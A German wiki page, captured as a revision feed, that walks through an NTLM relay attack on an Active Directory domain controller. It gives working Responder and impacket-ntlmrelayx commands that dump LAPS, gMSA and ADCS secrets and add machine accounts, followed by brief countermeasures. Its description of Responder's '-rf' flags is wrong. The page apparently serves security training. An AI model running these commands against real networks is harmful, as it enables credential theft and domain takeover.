https://wiki.ixheim.de/index.php?action=history&feed=atom&title=NTLM-Relay-Angriff_mit_Impacket%3A_Dom%C3%A4nenkompromittierung_via_LDAP
NTLM-Relay-Angriff mit Impacket: Domänenkompromittierung via LDAP - Versionsgeschichte
2026-06-28T18:52:52Z
Versionsgeschichte dieser Seite in Xinux Wiki
MediaWiki 1.35.1
https://wiki.ixheim.de/index.php?title=NTLM-Relay-Angriff_mit_Impacket:_Dom%C3%A4nenkompromittierung_via_LDAP&diff=63146&oldid=prev
Thomas.will: Die Seite wurde neu angelegt: „= NTLM-Relay-Angriff mit Impacket: Domänenkompromittierung via LDAP = == Ziel == Ein Angreifer leitet die NTLM-Authentifizierung eines Windows-Clients auf ei…“
2025-05-18T13:00:30Z
<p>Die Seite wurde neu angelegt: „= NTLM-Relay-Angriff mit Impacket: Domänenkompromittierung via LDAP = == Ziel == Ein Angreifer leitet die NTLM-Authentifizierung eines Windows-Clients auf ei…“</p>
<p><b>Neue Seite</b></p><div>= NTLM-Relay-Angriff mit Impacket: Domänenkompromittierung via LDAP =<br />
<br />
== Ziel ==<br />
Ein Angreifer leitet die NTLM-Authentifizierung eines Windows-Clients auf einen Domain Controller (DC) um, um:<br />
* Benutzer-Hashes zu stehlen (für Passwort-Cracking oder Pass-the-Hash)<br />
* Schädliche Gruppenrichtlinien (GPOs) zu erstellen<br />
* Neue Benutzer mit Admin-Rechten anzulegen<br />
<br />
== Voraussetzungen ==<br />
* Netzwerkzugriff zum Ziel-Subnetz<br />
* LLMNR/NBT-NS-Poisoning aktiv auf Zielgeräten<br />
* SMB-Signing nicht erzwungen auf dem DC<br />
* Domain Controller mit LDAP/SMB-Exposition<br />
<br />
== Angriffsablauf ==<br />
<br />
=== Schritt 1: Responder für Poisoning konfigurieren ===<br />
<pre><br />
responder -I eth0 -wrf<br />
</pre><br />
* <code>-I</code>: Netzwerkinterface<br />
* <code>-w</code>: WPAD-Rogue-Server<br />
* <code>-rf</code>: Aktiviere FTP/SMB-Rogue-Server<br />
<br />
=== Schritt 2: NTLM-Relay auf LDAP starten ===<br />
<pre><br />
impacket-ntlmrelayx -t ldap://dc01.domain.local -smb2support \<br />
--remove-mic --add-computer --delegate-access \<br />
--dump-laps --dump-gmsa --dump-adcs<br />
</pre><br />
<br />
=== Schritt 3: Erfolgreichen Relay nutzen ===<br />
Nach erfolgreichem Relay erscheinen gesammelte Daten:<br />
* Benutzer-Hashes<br />
* LAPS-Passwörter<br />
* GMSA-Konten<br />
* ADCS-Zertifikate<br />
<br />
== Schutzmaßnahmen ==<br />
* LLMNR/NBT-NS deaktivieren<br />
* SMB-Signing erzwingen<br />
* LDAP-Signing und Channel Binding aktivieren<br />
* NTLM vollständig deaktivieren (Kerberos bevorzugen)</div>
Thomas.will